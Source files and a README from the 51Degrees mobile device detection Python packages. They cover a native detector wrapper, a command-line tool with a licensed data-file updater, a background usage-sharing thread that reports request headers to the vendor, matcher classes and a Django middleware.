        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetPublishedDate(self)
    def getDataSetNextUpdateDate(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetNextUpdateDate(self)
    def getDataSetSignatureCount(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetSignatureCount(self)
    def getDataSetDeviceCombinations(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetDeviceCombinations(self)
    def getMatch(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getMatch(self, *args)
    def getMatchJson(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getMatchJson(self, *args)
    def getMatchForDeviceId(self, deviceId):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getMatchForDeviceId(self, deviceId)
    def findProfiles(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_findProfiles(self, *args)
    def reloadFromFile(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_reloadFromFile(self)
    def reloadFromMemory(self, source, length):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_reloadFromMemory(self, source, length)
    def getCacheHits(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getCacheHits(self)
    def getCacheMisses(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getCacheMisses(self)
    def getCacheMaxIterations(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getCacheMaxIterations(self)
    def getIsThreadSafe(self):
        return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getIsThreadSafe(self)
    def __init__(self, *args):
        # SWIG boilerplate: attach the newly created C++ object to this proxy.
        this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_Provider(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
# Register Provider in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.Provider_swigregister(Provider)
# This file is compatible with both classic and new-style classes. | 51degrees-mobile-detector-v3-wrapper | /51degrees-mobile-detector-v3-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-wrapper-3.2.18.4/FiftyOneDegrees/fiftyone_degrees_mobile_detector_v3_wrapper.py | fiftyone_degrees_mobile_detector_v3_wrapper.py |
|51degrees|
Device Detection Python API
51Degrees Mobile Detector is a server side mobile detection solution.
Changelog
====================
- Fixed a bug where an additional compile argument was causing compilation errors with clang.
- Updated the v3-trie-wrapper package to include the Lite Hash Trie data file.
- Updated Lite Pattern data file for November.
- Update Lite Hash Trie data file for November.
General
========
Before you start matching user agents, you may wish to configure the solution to use a different database. You can easily generate a sample settings file running the following command
$ 51degrees-mobile-detector settings > ~/51degrees-mobile-detector.settings.py
The core ``51degrees-mobile-detector`` is included as a dependency when installing either the ``51degrees-mobile-detector-v3-wrapper`` or ``51degrees-mobile-detector-v3-trie-wrapper`` packages.
During install a directory which contains your data file will be created in ``~\51Degrees``.
Settings
=========
General Settings
----------------
- ``DETECTION_METHOD`` (defaults to 'v3-wrapper'). Sets the preferred mobile device detection method. Available options are v3-wrapper (requires the 51degrees-mobile-detector-v3-wrapper package) and v3-trie-wrapper (requires the 51degrees-mobile-detector-v3-trie-wrapper package).
- ``PROPERTIES`` (defaults to ''). List of case-sensitive property names to be fetched on every device detection. Leave empty to fetch all available properties.
- ``LICENCE`` Your 51Degrees license key for enhanced device data. This is required if you want to set up the automatic 51degrees-mobile-detector-premium-pattern-wrapper package updates.
Trie Detector settings
-----------------------
- ``V3_TRIE_WRAPPER_DATABASE`` Location of the Hash Trie data file.
Pattern Detector settings
--------------------------
- ``V3_WRAPPER_DATABASE`` Location of the Pattern data file.
- ``CACHE_SIZE`` (defaults to 10000). Sets the size of the workset cache.
- ``POOL_SIZE`` (defaults to 20). Sets the size of the workset pool.
Usage Sharer Settings
----------------------
- ``USAGE_SHARER_ENABLED`` (defaults to True). Indicates if usage data should be shared with 51Degrees.com. We recommend leaving this value unchanged to ensure we're improving the performance and accuracy of the solution.
- Advanced usage sharer settings are detailed in your settings file.
Automatic Updates
------------------
If you want to set up automatic updates, add your license key to your settings and add the following command to your cron
$ 51degrees-mobile-detector update-premium-pattern-wrapper
NOTE: Currently auto updates are only available with our Pattern API.
Usage
======
Core
-----
By executing the following a useful help page will be displayed explaining basic usage.
$ 51degrees-mobile-detector
To check everything is set up, try fetching a match with
$ 51degrees-mobile-detector match "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176"
Examples
=========
Additional examples can be found on our GitHub_ repository.
User Support
============
If you have any issues please get in touch with our Support_ or open an issue on our GitHub_ repository.
.. |51degrees| image:: https://51degrees.com/DesktopModules/FiftyOne/Distributor/Logo.ashx?utm_source=github&utm_medium=repository&utm_content=readme_pattern&utm_campaign=python-open-source
:target: https://51degrees.com
.. _GitHub: https://github.com/51Degrees/Device-Detection/tree/master/python
.. _Support: support@51degrees.com
| 51degrees-mobile-detector | /51degrees-mobile-detector-3.2.18.4.tar.gz/51degrees-mobile-detector-3.2.18.4/README.rst | README.rst |
from __future__ import absolute_import
import os
import sys
import subprocess
def settings(args, help):
    """Dump the source code of the default settings module to stdout.

    *args* and *help* are part of the common sub-command signature and
    are not used by this command.
    """
    import inspect
    from fiftyone_degrees.mobile_detector.conf import default
    sample = inspect.getsource(default)
    sys.stdout.write(sample)
def match(args, help):
    """Run a device detection for one user agent string.

    Expects exactly one positional argument (the user agent).  Each
    detected property is written to stdout as ``name: value``; on a bad
    argument count the usage text is written to stderr and the process
    exits with status 1.
    """
    # Guard clause: anything other than exactly one argument is an error.
    if len(args) != 1:
        sys.stderr.write(help)
        sys.exit(1)
    from fiftyone_degrees import mobile_detector
    device = mobile_detector.match(args[0])
    for name, value in device.properties.iteritems():
        sys.stdout.write('%s: %s\n' % (name, unicode(value),))
def update_premium_pattern_wrapper(args, help):
    """Download and install the latest premium Pattern data file.

    Requires a valid license key (``settings.LICENSE``).  The gzipped data
    file is fetched from the 51Degrees distributor, unpacked to a
    temporary file and finally copied over the database configured in
    ``settings.V3_WRAPPER_DATABASE``.  Temporary files are removed on both
    the success and the failure paths.

    *args* and *help* are part of the common sub-command signature and
    are not used by this command.
    """
    import tempfile
    import urllib2
    import gzip
    import shutil
    from fiftyone_degrees.mobile_detector.conf import settings
    sys.stdout.write('Starting Update \n')
    if not settings.LICENSE:
        sys.stderr.write('Failed to download the package: you need a license key. Please, check your settings.\n')
        return
    # Build source URL.
    url = 'https://distributor.51degrees.com/api/v2/download?LicenseKeys=%s&Type=BinaryV32&Download=True' % (
        settings.LICENSE
    )
    with tempfile.NamedTemporaryFile(
            suffix='.dat.gz',
            prefix='51d_temp',
            delete=False) as fh:
        try:
            # Fetch URL (no verification of the server's certificate here).
            uh = urllib2.urlopen(url, timeout=120)
            # A Content-Disposition header signals an actual file download
            # (as opposed to an error page from the distributor).
            if uh.headers['Content-Disposition'] is not None:
                # Download the package in chunks, reporting progress.
                file_size = int(uh.headers['Content-Length'])
                sys.stdout.write('=> Downloading %s bytes... ' % file_size)
                downloaded = 0
                while True:
                    buffer = uh.read(8192)
                    if not buffer:
                        break
                    downloaded += len(buffer)
                    fh.write(buffer)
                    status = r'%3.2f%%' % (downloaded * 100.0 / file_size)
                    # Backspaces rewind the cursor so the next progress
                    # update overwrites the previous one in place.
                    status = status + chr(8) * (len(status) + 1)
                    sys.stdout.write(status)
                # Done with temporary file. Close it.
                if not fh.closed:
                    fh.close()
                # Unpack the gzipped download into a temporary .dat file.
                f_name = fh.name
                zipped_file = gzip.open(f_name, "rb")
                unzipped_file = open("unzipped_temp.dat", "wb")
                unzipped_file.write(zipped_file.read())
                # Close and remove the compressed file.
                zipped_file.close()
                os.remove(f_name)
                # Close the unzipped file before copying.
                unzipped_file.close()
                # Copy unzipped file to the file used for detection.
                shutil.copy2("unzipped_temp.dat", settings.V3_WRAPPER_DATABASE)
                sys.stdout.write("\n Update was successful \n")
            else:
                sys.stderr.write('Failed to download the package: is your license key expired?\n')
        except Exception as e:
            sys.stderr.write('Failed to download the package: %s.\n' % unicode(e))
        finally:
            # Best-effort cleanup: try each temporary file independently so
            # one failure does not leak the other.  (os.remove() needs a
            # path, i.e. fh.name, not the file object itself.)
            for leftover in ("unzipped_temp.dat", fh.name):
                try:
                    os.remove(leftover)
                except OSError:
                    # Already removed on the success path, or never created.
                    pass
def main():
    """Command line entry point: dispatch to the requested sub-command."""
    # Build help message.
    help = '''Usage:
  %(cmd)s settings:
    Dumps sample settings file.
  %(cmd)s match <user agent>
    Fetches device properties based on the input user agent string.
  %(cmd)s update-premium-pattern-wrapper
    Downloads and installs latest premium pattern wrapper package available
    at 51Degrees.com website (a valid license key is required).
''' % {
        'cmd': os.path.basename(sys.argv[0])
    }
    # No sub-command at all is a usage error.
    if len(sys.argv) <= 1:
        sys.stderr.write(help)
        sys.exit(1)
    # Sub-commands use dashes on the command line but underscores in
    # their handler function names.
    command = sys.argv[1].replace('-', '_')
    if command not in ('settings', 'match', 'update_premium_pattern_wrapper'):
        sys.stderr.write(help)
        sys.exit(1)
    # Dispatch to the handler of the same name defined in this module.
    handler = getattr(sys.modules[__name__], command)
    handler(sys.argv[2:], help)


if __name__ == '__main__':
    main()
from __future__ import absolute_import
from datetime import datetime
import gzip
import urllib2
import threading
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
try:
import cStringIO as StringIO
except ImportError:
import StringIO
from fiftyone_degrees.mobile_detector.conf import settings
class UsageSharer(threading.Thread):
    '''Class used to record usage information.
    Records & submits usage information which is essential to ensuring
    51Degrees.mobi is optimized for performance and accuracy for current
    devices on the web.
    '''
    # Singleton reference.
    _instance = None
    def __init__(self):
        super(UsageSharer, self).__init__()
        # Check singleton instance.
        if self._instance is not None:
            raise ValueError('An instance of UsageSharer class already exists.')
        # Init internal singleton state.
        # _queue holds XML <Device> elements pending submission; _event is
        # used to wake the background thread whenever new data is queued
        # or the sharer is being stopped.
        self._queue = []
        self._stopping = False
        self._event = threading.Event()
    @classmethod
    def instance(cls):
        '''Returns singleton UsageSharer instance.
        '''
        if cls._instance is None:
            cls._instance = cls()
        return cls._instance
    def record(self, client_ip, http_headers):
        '''Adds request details.
        Adds some request details to the queue for further submission by
        the background thread.
        *client_ip* is a string with the client IP address.
        *http_headers* is a dictionary containing all HTTP headers.
        '''
        # Enabled?
        if settings.USAGE_SHARER_ENABLED and self._stopping == False:
            # Launch background daemon data submission thread if not running.
            # Daemon mode means the thread will not block interpreter exit.
            if not self.is_alive():
                self.daemon = True
                self.start()
            # Add the request details to the queue for further submission.
            self._queue.append(self._get_item(client_ip, http_headers))
            # Signal the background thread to check if it should send
            # queued data.
            self._event.set()
    def stop(self):
        '''Gracefully stops background data submission thread.
        Flushes any queued data before returning (see the submission
        condition in run()).
        '''
        if self.is_alive():
            settings.logger.info('Stopping 51Degrees UsageSharer.')
            self._stopping = True
            self._event.set()
            self.join()
    def run(self):
        '''Runs the background daemon data submission thread.
        Used to send the devices data back to 51Degrees.mobi after the
        minimum queue length has been reached.
        '''
        # Log.
        settings.logger.info('Starting 51Degrees UsageSharer.')
        # Submission loop.
        while not self._stopping:
            # Wait while event's flag is set to True.
            while not self._event.is_set():
                self._event.wait()
            # If there are enough items in the queue, or the thread is being
            # stopped, submit the queued data.
            length = len(self._queue)
            if length >= settings.USAGE_SHARER_MINIMUM_QUEUE_LENGTH or (length > 0 and self._stopping):
                self._submit()
            # Reset the internal event's flag to False.
            self._event.clear()
        # Log.
        settings.logger.info('Stopped 51Degrees UsageSharer.')
    def _is_local(self, address):
        # True when *address* is one of the configured local addresses
        # that must not be reported (see USAGE_SHARER_LOCAL_ADDRESSES).
        return address in settings.USAGE_SHARER_LOCAL_ADDRESSES
    def _get_item(self, client_ip, http_headers):
        '''Builds and returns the XML <Device> element for one request.'''
        # Create base device element.
        device = ET.Element('Device')
        # Add the current date and time.
        item = ET.SubElement(device, 'DateSent')
        item.text = datetime.utcnow().replace(microsecond=0).isoformat()
        # Add product name and version.
        item = ET.SubElement(device, 'Version')
        item.text = settings.VERSION
        item = ET.SubElement(device, 'Product')
        item.text = 'Python Mobile Detector'
        # Add client IP address (if is not local).
        if not self._is_local(client_ip):
            item = ET.SubElement(device, 'ClientIP')
            item.text = client_ip
        # Filter & add HTTP headers.
        for name, value in http_headers.iteritems():
            # Determine if the field should be treated as a blank.
            blank = name.upper() in settings.USAGE_SHARER_IGNORED_HEADER_FIELD_VALUES
            # Include all header values if maximum detail is enabled, or
            # header values related to the user agent or any header
            # key containing profile or information helpful to determining
            # mobile devices.
            if settings.USAGE_SHARER_MAXIMUM_DETAIL or \
               name.upper() in ('USER-AGENT', 'HOST', 'PROFILE') or \
               blank:
                item = ET.SubElement(device, 'Header')
                item.set('Name', name)
                # "Blank" headers are reported by name only; their values
                # are deliberately omitted.
                if not blank:
                    item.text = unicode(value)
        # Done!
        return device
    def _submit(self):
        '''Sends all the data on the queue.
        '''
        settings.logger.info('Submitting UsageSharer queued data to %s.' % settings.USAGE_SHARER_SUBMISSION_URL)
        # Build output stream.
        stream = StringIO.StringIO()
        gzStream = StringIO.StringIO()
        devices = ET.Element('Devices')
        # Drain the queue into a single <Devices> document.
        while len(self._queue) > 0:
            devices.append(self._queue.pop())
        ET.ElementTree(devices).write(
            stream,
            encoding='utf8',
            xml_declaration=True)
        stream.seek(0,0)
        # Gzip the data.
        with gzip.GzipFile(fileobj=gzStream, mode='wb') as gzObj:
            gzObj.write(stream.read())
        gzStream.seek(0,0)
        # Submit gzipped data.
        request = urllib2.Request(
            url=settings.USAGE_SHARER_SUBMISSION_URL,
            data=gzStream.read(),
            headers={
                'Content-Type': 'text/xml; charset=utf-8',
                'Content-Encoding': 'gzip',
            })
        try:
            response = urllib2.urlopen(request, timeout=settings.USAGE_SHARER_SUBMISSION_TIMEOUT)
        except:
            # Turn off functionality.
            # NOTE(review): this bare except also swallows SystemExit /
            # KeyboardInterrupt; consider narrowing to urllib2.URLError.
            self._stopping = True
        else:
            # Get the response and record the content if it's valid. If it's
            # not valid consider turning off the functionality.
            code = response.getcode()
            if code == 200:
                # OK. Do nothing.
                pass
            elif code == 408:
                # Request Timeout. Could be temporary, do nothing.
                pass
            else:
                # Turn off functionality.
                self._stopping = True
from __future__ import absolute_import
from abc import ABCMeta
from fiftyone_degrees.mobile_detector.conf import settings
from fiftyone_degrees.mobile_detector import usage
class Device(object):
    '''Simple device wrapper.

    Holds the detection method identifier plus a dictionary of detected
    properties, which are also exposed as (case-insensitive) attributes.
    Supports pickling (used by the Django middleware session cache).
    '''
    def __init__(self, method=None):
        self._method = method
        self._properties = {}

    def set_property(self, name, value):
        '''Stores the detected property *value* under *name*.'''
        self._properties[name] = value

    @property
    def method(self):
        '''Detection method identifier (e.g. 'v3-wrapper') or None.'''
        return self._method

    @property
    def properties(self):
        '''Dictionary of all detected properties.'''
        return self._properties

    def __getattr__(self, name):
        # Exact property name first; then a case-insensitive fallback so
        # e.g. device.ismobile resolves the 'IsMobile' property.  Unknown
        # names resolve to None rather than raising AttributeError.
        if name in self._properties:
            return self._properties.get(name)
        else:
            name = name.lower()
            # items() instead of the Python 2-only iteritems() keeps the
            # fallback working on both Python 2 and Python 3.
            for aname, value in self._properties.items():
                if name == aname.lower():
                    return value
            return None

    def __getstate__(self):
        # Explicit pickle support: the instance state is just __dict__.
        return self.__dict__

    def __setstate__(self, d):
        self.__dict__.update(d)
class _Matcher(object):
'''Abstract matcher class.
'''
__metaclass__ = ABCMeta
_METHODS = {}
_INSTANCES = {}
@classmethod
def register(cls, method, klass):
cls._METHODS[method] = klass
@classmethod
def instance(cls, method):
if method in cls._METHODS:
if method not in cls._INSTANCES:
cls._INSTANCES[method] = cls._METHODS[method]()
return cls._INSTANCES[method]
else:
raise Exception(
'Requested matching method "%s" does not exist. '
'Available methods are: %s.' %
(method, ', '.join(cls._METHODS.keys()),))
def match(self, user_agent, client_ip=None, http_headers=None):
# If provided, share usage information.
if client_ip and http_headers:
usage.UsageSharer.instance().record(client_ip, http_headers)
# Delegate on specific matcher implementation.
return self._match(user_agent)
def _match(self, user_agent):
raise NotImplementedError('Please implement this method.')
class _V3WrapperMatcher(_Matcher):
    '''Pattern-based detection back-end ('v3-wrapper').

    Wraps the native 51Degrees Pattern detector; requires the
    ``51degrees-mobile-detector-v3-wrapper`` package and a Pattern database
    file configured in ``settings.V3_WRAPPER_DATABASE``.
    '''
    ID = 'v3-wrapper'

    def __init__(self):
        # Was previously a misleading copy-paste of the Trie matcher's
        # message; this back-end is the Pattern one.
        if not settings.V3_WRAPPER_DATABASE:
            raise Exception(
                'Pattern-based detection method depends on an external '
                'database file. Please, check your settings.')
        try:
            # Does the database file exist and is it readable?
            with open(settings.V3_WRAPPER_DATABASE):
                pass
        except IOError:
            raise Exception(
                'The provided detection database file (%s) does not '
                'exist or is not readable. Please, '
                'check your settings.' % settings.V3_WRAPPER_DATABASE)
        from FiftyOneDegrees import fiftyone_degrees_mobile_detector_v3_wrapper
        self.provider = fiftyone_degrees_mobile_detector_v3_wrapper.Provider(
            settings.V3_WRAPPER_DATABASE,
            settings.PROPERTIES,
            int(settings.CACHE_SIZE),
            int(settings.POOL_SIZE))

    def _match(self, user_agent):
        '''Runs the wrapped detector and converts the result to a Device.

        Detection errors are logged, never propagated: an (empty) Device
        is still returned.
        '''
        returnedMatch = None
        try:
            returnedMatch = self.provider.getMatch(user_agent)
        except Exception as e:
            settings.logger.error(
                'Got exception while matching user agent string "%s": %s.'
                % (user_agent, unicode(e),))
        result = Device(self.ID)
        if returnedMatch:
            # Match metadata properties.
            result.set_property('Id', returnedMatch.getDeviceId())
            result.set_property('MatchMethod', returnedMatch.getMethod())
            result.set_property('Difference', returnedMatch.getDifference())
            result.set_property('Rank', returnedMatch.getRank())
            # An empty PROPERTIES setting means "fetch everything available".
            if settings.PROPERTIES == '':
                for key in self.provider.getAvailableProperties():
                    value = returnedMatch.getValues(key)
                    if value:
                        result.set_property(key, ' '.join(value))
                    else:
                        # Property exists but has no value in the Lite data.
                        result.set_property(key, 'N/A in Lite')
            else:
                for key in settings.PROPERTIES.split(','):
                    value = returnedMatch.getValues(key)
                    if value:
                        result.set_property(key, ' '.join(value))
        return result
class _V3TrieWrapperMatcher(_Matcher):
    '''Trie-based detection back-end ('v3-trie-wrapper').

    Wraps the native 51Degrees Hash Trie detector; requires the
    ``51degrees-mobile-detector-v3-trie-wrapper`` package and a Hash Trie
    database file configured in ``settings.V3_TRIE_WRAPPER_DATABASE``.
    '''
    ID = 'v3-trie-wrapper'

    def __init__(self):
        if not settings.V3_TRIE_WRAPPER_DATABASE:
            raise Exception(
                'Trie-based detection method depends on an external '
                'database file. Please, check your settings.')
        try:
            # Does the database file exist and is it readable?
            with open(settings.V3_TRIE_WRAPPER_DATABASE):
                pass
        except IOError:
            raise Exception(
                'The provided detection database file (%s) does not '
                'exist or is not readable. Please, '
                'check your settings.' % settings.V3_TRIE_WRAPPER_DATABASE)
        from FiftyOneDegrees import fiftyone_degrees_mobile_detector_v3_trie_wrapper
        self.provider = fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider(
            settings.V3_TRIE_WRAPPER_DATABASE, settings.PROPERTIES)

    def _match(self, user_agent):
        '''Runs the wrapped detector and converts the result to a Device.

        Detection errors are logged, never propagated: an (empty) Device
        is still returned.  (A leftover debug print of settings.PROPERTIES
        was removed from this method.)
        '''
        returnedMatch = None
        try:
            returnedMatch = self.provider.getMatch(user_agent)
        except Exception as e:
            settings.logger.error(
                'Got exception while matching user agent string "%s": %s.'
                % (user_agent, unicode(e),))
        result = Device(self.ID)
        if returnedMatch:
            # An empty PROPERTIES setting means "fetch everything available".
            if settings.PROPERTIES == '':
                for key in self.provider.getAvailableProperties():
                    value = returnedMatch.getValues(key)
                    if value:
                        result.set_property(key, ' '.join(value))
                    else:
                        # Property exists but has no value in the Lite data.
                        result.set_property(key, 'N/A in Lite')
            else:
                for key in settings.PROPERTIES.split(','):
                    value = returnedMatch.getValues(key)
                    if value:
                        result.set_property(key, ' '.join(value))
        return result
# Register matching methods so _Matcher.instance() can look them up by
# their identifier ('v3-wrapper' / 'v3-trie-wrapper').
for klass in [_V3WrapperMatcher, _V3TrieWrapperMatcher]:
    _Matcher.register(klass.ID, klass)
def match(user_agent, client_ip=None, http_headers=None, method=None):
    '''Runs a device detection for *user_agent* and returns a Device.

    *client_ip* (optional) is the client IP address; *http_headers*
    (optional) is a dictionary of all HTTP headers.  When both are given
    they are submitted to 51Degrees.mobi (with confidential data such as
    cookies removed) to help improve the performance and accuracy of
    further detections.

    *method* (optional) selects the detection back-end; when omitted the
    configured settings.DETECTION_METHOD is used.
    '''
    # Resolve the back-end identifier, then delegate to its singleton.
    if method is None:
        method = settings.DETECTION_METHOD
    matcher = _Matcher.instance(method)
    return matcher.match(user_agent, client_ip, http_headers)
from __future__ import absolute_import
import string
import logging
import pickle
from django.core.validators import validate_ipv46_address
from django.core.exceptions import ValidationError
from django.conf import settings
from fiftyone_degrees import mobile_detector
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError:
MiddlewareMixin = object
# Names of the optional Django settings looked up on django.conf.settings.
SESSION_CACHE = 'FIFTYONE_DEGREES_MOBILE_DETECTOR_SESSION_CACHE'  # bool: cache detection per session
SESSION_FIELD = 'FIFTYONE_DEGREES_MOBILE_DETECTOR_SESSION_FIELD'  # str: session key for the cached device
# Default values used when the settings above are not defined.
DEFAULT_SESSION_CACHE = False
DEFAULT_SESSION_FIELD = '_51degrees_device'
class DetectorMiddleware(MiddlewareMixin):
    '''Django middleware attaching a lazy ``device`` attribute to requests.

    The attribute is a _Device proxy, so no detection work happens until
    a view actually reads a device property.
    '''
    def process_request(self, request):
        request.device = _Device(request)
        # Returning None tells Django to keep processing the request.
        return None
class _Device(object):
'''Proxies lazily generated 'mobile_detector.Device' instance.
'''
def __init__(self, request):
self._request = request
self._device = None
def __getattr__(self, name):
if self._device is None:
self._device = self._fetch()
return getattr(self._device, name)
def _fetch(self):
# Do *not* break the request when not being able to detect device.
try:
if getattr(settings, SESSION_CACHE, DEFAULT_SESSION_CACHE) and \
hasattr(self._request, 'session'):
field = getattr(settings, SESSION_FIELD, DEFAULT_SESSION_FIELD)
if field not in self._request.session:
device = self._match()
self._request.session[field] = pickle.dumps(device)
else:
device = pickle.loads(self._request.session[field])
else:
device = self._match()
except Exception as e:
logging.\
getLogger('fiftyone_degrees.mobile_detector').\
error('Got an exception while detecting device: %s.' % unicode(e))
device = mobile_detector.Device()
# Done!
return device
def _match(self):
# Fetch client IP address.
client_ip = self._request.META.get('REMOTE_ADDR')
if 'HTTP_X_FORWARDED_FOR' in self._request.META:
# HTTP_X_FORWARDED_FOR can be a comma-separated list of IPs.
# Take just the first valid one (proxies like squid may introduce
# invalid values like 'unknown' under certain configurations, so
# a validations is always required).
for ip in self._request.META['HTTP_X_FORWARDED_FOR'].split(','):
ip = ip.strip()
try:
validate_ipv46_address(ip)
client_ip = ip
break
except ValidationError:
pass
# Fetch HTTP headers.
# See: https://docs.djangoproject.com/en/dev/ref/request-response/#django.http.HttpRequest.META
http_headers = {}
for name, value in self._request.META.iteritems():
if name in ('CONTENT_LENGTH', 'CONTENT_TYPE',):
http_headers[self._normalized_header_name(name)] = value
elif name.startswith('HTTP_'):
http_headers[self._normalized_header_name(name[5:])] = value
# Match.
return mobile_detector.match(http_headers)
def _normalized_header_name(self, value):
value = value.replace('_', ' ')
value = string.capwords(value)
return value.replace(' ', '-') | 51degrees-mobile-detector | /51degrees-mobile-detector-3.2.18.4.tar.gz/51degrees-mobile-detector-3.2.18.4/fiftyone_degrees/mobile_detector/contrib/django/middleware.py | middleware.py |